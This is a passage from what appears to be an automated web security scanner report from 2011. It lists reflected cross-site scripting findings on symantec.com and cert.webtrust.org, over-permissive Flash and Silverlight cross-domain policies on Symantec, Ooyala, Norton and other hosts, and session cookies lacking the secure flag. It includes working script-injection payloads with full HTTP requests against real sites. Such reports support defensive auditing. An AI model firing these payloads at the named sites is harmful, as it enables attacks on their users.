3.34. http://www.symantec.com/s/searchg/suggest [q parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/s/searchg/suggest
Issue detail
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 6b734<script>alert(1)</script>b1904ad5262 was submitted in the q parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/searchg/suggest?q=xss6b734<script>alert(1)</script>b1904ad5262 &max=10&site=symc_en_US&client=symc_en_US&access=p&format=rich HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Content-Length: 73 Expires: Fri, 09 Sep 2011 21:33:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:33:43 GMT Connection: close Vary: Accept-Encoding { "query":"xss6b734<script>alert(1)</script>b1904ad5262 ", "results": [] }
3.35. https://cert.webtrust.org/ViewSeal [Referer HTTP header]
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://cert.webtrust.org
Path:
/ViewSeal
Issue detail
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 3e394<script>alert(1)</script>ae07fae4fa3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ViewSeal?id=304 HTTP/1.1 Host: cert.webtrust.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3e394<script>alert(1)</script>ae07fae4fa3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 20:14:37 GMT Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector) X-Cache: MISS from cert.webtrust.org Connection: close Content-Type: text/html Content-Length: 258 <html> <head> <title>Web Trust</title> <link rel="stylesheet" href="/admin.css" type="text/css"> </head> <body> Invalid domain [http://www.google.com/search?hl=en&q=3e394<script>alert(1)</script>ae07fae4fa3 ]: please contact your practitioner.</body>...[SNIP]...
4. Flash cross-domain policy
previous
next
There are 18 instances of this issue:
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user. Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
4.1. http://ak.c.ooyala.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ak.c.ooyala.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ak.c.ooyala.com
Response
HTTP/1.0 200 OK x-amz-id-2: KN3pSbRmPOnrtBbaZkJNn0JMK9l3niD957+u/ulcUqm9Ba/xmDtCsu4+ok1rK7GJ x-amz-request-id: 46F7B2194FCF4B8A Last-Modified: Mon, 12 Jan 2009 21:58:46 GMT ETag: "124fa42a56284acbe74862f0024af4f3" Content-Type: text/x-cross-domain-policy Content-Length: 157 Server: AmazonS3 Cache-Control: max-age=604800 Date: Fri, 09 Sep 2011 21:26:10 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> <allow-access-from domain="* "/> </cross-domain-policy>
4.2. http://cp76677.edgefcs.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://cp76677.edgefcs.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: cp76677.edgefcs.net Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Connection: Keep-Alive Content-Length: 187 Server: FlashCom/3.5.6 Content-Type: application/xml <?xml version="1.0" encoding="utf-8" ?> <cross-domain-policy> <allow-access-from domain="* "/> <site-control permitted-cross-domain-policies="master-only"/> </cross-domain-policy>
4.3. http://mbox3.offermatica.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://mbox3.offermatica.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: mbox3.offermatica.com
Response
HTTP/1.1 200 OK Server: Test & Target Content-Type: application/xml Date: Fri, 09 Sep 2011 21:24:35 GMT Accept-Ranges: bytes ETag: W/"201-1315435999000" Connection: close Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT Content-Length: 201 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>...[SNIP]...
4.4. http://om.symantec.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://om.symantec.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: om.symantec.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:11 GMT Server: Omniture DC/2.0.0 xserver: www500 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*" /> </cross-domain-policy>
4.5. http://player.ooyala.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://player.ooyala.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: player.ooyala.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 06 Sep 2011 23:02:21 GMT X-Ooyala-Server-Id: i-2a1c3f45 Content-Type: text/x-cross-domain-policy Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Length: 319 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all" />...[SNIP]... <allow-access-from domain="* " />...[SNIP]...
4.6. https://symantec-corporation.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://symantec-corporation.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: symantec-corporation.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:30 GMT Server: Apache Last-Modified: Wed, 19 May 2010 01:45:45 GMT ETag: "4500fc-148-486e89dcf8440" Accept-Ranges: bytes Content-Length: 328 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for Responsys, Inc. Last edit $Date: 2010-05-18 18:42:54...[SNIP]... <allow-access-from domain="* " secure="false" />...[SNIP]...
4.7. http://symantec.tt.omtrdc.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://symantec.tt.omtrdc.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: symantec.tt.omtrdc.net
Response
HTTP/1.1 200 OK Server: Test & Target Content-Type: application/xml Date: Fri, 09 Sep 2011 21:30:59 GMT Accept-Ranges: bytes ETag: W/"201-1315435999000" Connection: close Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT Content-Length: 201 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>...[SNIP]...
4.8. http://ch.norton.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://ch.norton.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: ch.norton.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 436 Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT ETag: "1b4-4cae4fc0" Accept-Ranges: bytes Content-Type: text/xml;charset=UTF-8 Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:41:25 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!--File added for Flash apps--> <cross-domain-policy> <allow-access-from domain="*.symantec.com "/> <allow-access-from domain="*.norton.com "/> <allow-access-from domain="*.symantecstore.com "/> <allow-access-from domain="*.nortonopscenter.com "/> <allow-access-from domain="*.brightcove.com "/>...[SNIP]...
4.9. http://l.player.ooyala.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://l.player.ooyala.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.1 Host: l.player.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Server: nginx/0.7.61 Date: Fri, 09 Sep 2011 21:26:09 GMT Content-Type: text/x-cross-domain-policy Connection: close Cache-Control: max-age=3600, private Content-Length: 330 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all" />...[SNIP]... <allow-access-from domain="*.ooyala.com " />...[SNIP]...
4.10. http://us.norton.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://us.norton.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: us.norton.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 436 Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT ETag: "1b4-4cae4fc0" Accept-Ranges: bytes Content-Type: text/xml Cache-Control: public, max-age=2748 Date: Fri, 09 Sep 2011 21:30:57 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!--File added for Flash apps--> <cross-domain-policy> <allow-access-from domain="*.symantec.com "/> <allow-access-from domain="*.norton.com "/> <allow-access-from domain="*.symantecstore.com "/> <allow-access-from domain="*.nortonopscenter.com "/> <allow-access-from domain="*.brightcove.com "/>...[SNIP]...
4.11. https://us.norton.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://us.norton.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: us.norton.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 436 Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT ETag: "1b4-4cae4fc0" Accept-Ranges: bytes Content-Type: text/xml Date: Fri, 09 Sep 2011 21:47:32 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!--File added for Flash apps--> <cross-domain-policy> <allow-access-from domain="*.symantec.com "/> <allow-access-from domain="*.norton.com "/> <allow-access-from domain="*.symantecstore.com "/> <allow-access-from domain="*.nortonopscenter.com "/> <allow-access-from domain="*.brightcove.com "/>...[SNIP]...
4.12. https://www-secure.symantec.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www-secure.symantec.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT ETag: "22a-4b03330b" Content-Type: text/xml Date: Fri, 09 Sep 2011 21:47:32 GMT Content-Length: 554 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!--File added for Flash apps--> <cross-domain-policy> <allow-access-from domain="*.symantec.com "/> <allow-access-from domain="*.norton.com "/> <allow-access-from domain="*.symantecstore.com "/> <allow-access-from domain="*.nortonopscenter.com "/> <allow-access-from domain="*.securityprofessional.com "/> <allow-access-from domain="*.securitydash.com "/> <allow-access-from domain="*.brightcove.com "/>...[SNIP]...
4.13. http://www.symantec.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.symantec.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT ETag: "22a-4b03330b" Content-Type: text/xml Cache-Control: public, max-age=2498 Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Length: 554 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!--File added for Flash apps--> <cross-domain-policy> <allow-access-from domain="*.symantec.com "/> <allow-access-from domain="*.norton.com "/> <allow-access-from domain="*.symantecstore.com "/> <allow-access-from domain="*.nortonopscenter.com "/> <allow-access-from domain="*.securityprofessional.com "/> <allow-access-from domain="*.securitydash.com "/> <allow-access-from domain="*.brightcove.com "/>...[SNIP]...
4.14. http://1168.ic-live.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://1168.ic-live.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific other domains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: 1168.ic-live.com
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Thu, 17 Mar 2011 17:54:57 GMT ETag: "8045c-1c8-49eb15c03de40" Accept-Ranges: bytes Content-Length: 456 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml" Content-Type: text/xml X-Cache: MISS from i2a-coll-20 X-Cache-Lookup: MISS from i2a-coll-20:80 Via: 1.0 i2a-coll-20:80 (squid/2.6.STABLE21) Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master...[SNIP]... <allow-access-from domain="ecdev1.avery.com " secure="false" />...[SNIP]... <allow-access-from domain="ecdev1.averysignaturebinders.com " secure="false" />...[SNIP]... <allow-access-from domain="www.averysignaturebinders.com " secure="false" />...[SNIP]...
4.15. https://drh.img.digitalriver.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://drh.img.digitalriver.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: drh.img.digitalriver.com
Response
HTTP/1.0 200 OK ETag: "da-4ae73ece" Content-Type: text/xml Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=66808035819,0) Last-Modified: Tue, 27 Oct 2009 18:41:18 GMT Content-Length: 218 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app72 Accept-Ranges: bytes Date: Fri, 09 Sep 2011 21:41:50 GMT Connection: close <?xml version="1.0"?> <!-- http://www.adobe.com/crossdomain.xml --> <cross-domain-policy> <allow-access-from domain="gc.digitalriver.com " /> <allow-access-from domain="cx.digitalriver.com " /> </cr...[SNIP]...
4.16. http://twitter.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://twitter.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: twitter.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:05:29 GMT Server: Apache Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT Accept-Ranges: bytes Content-Length: 561 Cache-Control: max-age=1800 Expires: Fri, 09 Sep 2011 22:35:29 GMT Vary: Accept-Encoding X-XSS-Protection: 1; mode=block Connection: close Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd"> <al...[SNIP]... <allow-access-from domain="api.twitter.com " /> <allow-access-from domain="search.twitter.com " /> <allow-access-from domain="static.twitter.com " />...[SNIP]...
4.17. http://www.verisign.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:38 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT Accept-Ranges: bytes Content-Length: 213 Expires: Sun, 09 Oct 2011 21:24:38 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="cdn.verisign.com "/> </cross-d...[SNIP]...
4.18. https://www.verisign.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:45 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT Accept-Ranges: bytes Content-Length: 213 Expires: Sun, 09 Oct 2011 21:27:45 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="cdn.verisign.com "/> </cross-d...[SNIP]...
5. Silverlight cross-domain policy
previous
next
There are 2 instances of this issue:
Issue background
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user. Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
5.1. http://om.symantec.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://om.symantec.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: om.symantec.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:11 GMT Server: Omniture DC/2.0.0 xserver: www627 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </...[SNIP]...
5.2. http://player.ooyala.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://player.ooyala.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: player.ooyala.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 03 Aug 2011 01:50:51 GMT X-Ooyala-Server-Id: i-78a24c19 Content-Type: text/xml Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Length: 362 Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-methods="*" http-request-headers="*"> <domain uri="* "/> </allow-fr...[SNIP]...
6. SSL cookie without secure flag set
previous
next
There are 67 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
6.1. https://admin.instantservice.com/Customer
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://admin.instantservice.com
Path:
/Customer
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Customer HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:36:51 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices Location: https://admin.instantservice.com/customerclient_error.html?null Content-Length: 0 P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8
6.2. https://admin.instantservice.com/links/5851/14753
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://admin.instantservice.com
Path:
/links/5851/14753
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/14753 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
